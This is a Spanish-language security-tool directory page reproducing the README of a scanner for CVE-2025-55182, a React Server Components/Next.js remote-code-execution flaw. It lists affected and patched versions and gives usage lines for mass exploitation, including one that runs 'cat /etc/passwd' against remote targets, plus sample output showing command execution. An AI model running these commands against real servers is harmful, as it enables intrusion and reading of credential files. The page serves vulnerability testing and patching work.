Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-Scanner — Escáner automatizado para CVE-2025-55182: una vulnerabilidad crítica de RCE en React Server Components y Next.js. | Kitploit
Herramientas/GitHubGitHub/qixinlee/cve-2025-55182-scanner
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubqixinlee/cve-2025-55182-scanner

CVE-2025-55182-Scanner

Escáner automatizado para CVE-2025-55182: una vulnerabilidad crítica de RCE en React Server Components y Next.js.

Ver Repositorio
12hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182 Escáner de RCE

Herramienta de detección masiva y verificación para la vulnerabilidad de ejecución remota de código CVE-2025-55182 (React2Shell).

⚠️ Vulnerabilidad crítica CVSS 10.0 | Afecta a React Server Components y versiones 15.x/16.x de Next.js | Solo para pruebas de seguridad autorizadas

Resumen de la vulnerabilidad

CVE-2025-55182 (también conocido como "React2Shell") es una vulnerabilidad de ejecución remota de código (RCE) no autenticada con severidad máxima CVSS 10.0.

La vulnerabilidad se origina en un problema de deserialización insegura en el paquete react-server de React Server Components (RSC) al procesar el protocolo RSC "Flight". Un atacante puede ejecutar código arbitrario en el servidor vulnerable enviando solicitudes HTTP especialmente diseñadas.

Debido a que Next.js utiliza el protocolo RSC "Flight", incluso las aplicaciones creadas con la configuración predeterminada mediante create-next-app pueden ser explotadas sin que el desarrollador tenga que escribir código adicional. Desde el 5 de diciembre de 2025, se ha detectado que esta vulnerabilidad está siendo explotada activamente.

Versiones afectadas

Versiones afectadas de React Server Components:

PaqueteVersiones afectadas
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0

Versiones afectadas de Next.js (con App Router):

Otros frameworks/herramientas RSC potencialmente afectados:

  • react-router
  • waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk
  • RedwoodJS (modo RSC)

Mitigaciones temporales

⚠️ Nota importante: no se conocen mitigaciones temporales para esta vulnerabilidad; actualizar a una versión segura es la única solución.

Versiones recomendadas para actualizar:

  • React: actualice a 19.0.1, 19.1.2 o 19.2.1
  • Next.js: actualice a 16.0.7, 15.5.7, 15.4.8 o 15.3.6

Puede usar el paquete npm oficial fix-react2shell-next para ayudar a actualizar las aplicaciones Next.js afectadas.

Instalación de dependencias

root@kitploit:~
pip install requests

Uso

Uso básico

root@kitploit:~
# 批量扫描 (从urls.txt读取目标)
python CVE-2025-55182.py -f urls.txt

# 单目标测试
python CVE-2025-55182.py -u http://192.168.1.100:3000

Comandos personalizados

root@kitploit:~
# 执行 whoami 命令
python CVE-2025-55182.py -f urls.txt -c "whoami"

# 执行 hostname 命令
python CVE-2025-55182.py -u http://target.com -c "hostname"

# 读取文件
python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"

Opciones avanzadas

root@kitploit:~
# 指定线程数和超时时间
python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15

# 自定义输出文件
python CVE-2025-55182.py -f urls.txt -o scan_results.csv

# 静默模式 (只输出漏洞URL)
python CVE-2025-55182.py -f urls.txt -q

Descripción de parámetros

Formato del archivo de URL

Una URL por línea, por ejemplo:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000

Ejemplo de salida

root@kitploit:~
    +---------------------------------------------------------------+
    |   ###   ## #######  ##  ## ########       ## #######          |
    |   ####  ## ##       ## ##     ##          ## ##               |
    |   ## ## ## #####     ###      ##          ## #######          |
    |   ##  #### ##       ## ##     ##      ##  ##       ##         |
    |   ##   ### ####### ##   ##    ##       ####  #######          |
    |                                                               |
    |   CVE-2025-55182 RCE Scanner                                  |
    +---------------------------------------------------------------+

============================================================
  [ CONFIGURATION ]
============================================================
  > Targets: 10
  > Threads: 20
  > Command: id

============================================================
  [ SCANNING ]
============================================================
  [14:30:25] [VULN] http://192.168.1.10:3000
             '--> uid=1000(www-data)
  [14:30:26] [SAFE] http://192.168.1.11:3000

+==========================================================+
|                     SCAN COMPLETE                        |
+==========================================================+
|  Total Targets :    10                                   |
|  Vulnerable    :     1                                   |
|  Safe          :     9                                   |
|  Errors        :     0                                   |
+==========================================================+

Archivo de salida

Los resultados del escaneo se guardan en formato CSV e incluyen los siguientes campos:

  • url - URL del objetivo
  • status - Código de estado HTTP
  • vulnerable - Indica si es vulnerable
  • output - Salida de la ejecución del comando
  • error - Mensaje de error

Descargo de responsabilidad

Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas. No la utilice con fines ilegales. El usuario asume toda la responsabilidad derivada de su uso.

Descargar herramienta
Versión principalRango de versiones afectadasVersión corregida
16.0.x≤ 16.0.616.0.7
15.5.x≤ 15.5.615.5.7
15.4.x≤ 15.4.715.4.8
15.3.x≤ 15.3.515.3.6
15.2.x≤ 15.2.5-
15.1.x≤ 15.1.8-
15.0.x≤ 15.0.4-
14.x Canary≥ 14.3.0-canary.77-
ParámetroDescripciónValor predeterminado
-f, --fileArchivo de lista de URLurls.txt
-u, --urlURL de un solo objetivo-
-t, --threadsNúmero de hilos concurrentes20
--timeoutTiempo de espera de la solicitud (segundos)10
-o, --outputArchivo CSV de salidaresults.csv
-c, --commandComando a ejecutarid
-q, --quietModo silenciosofalse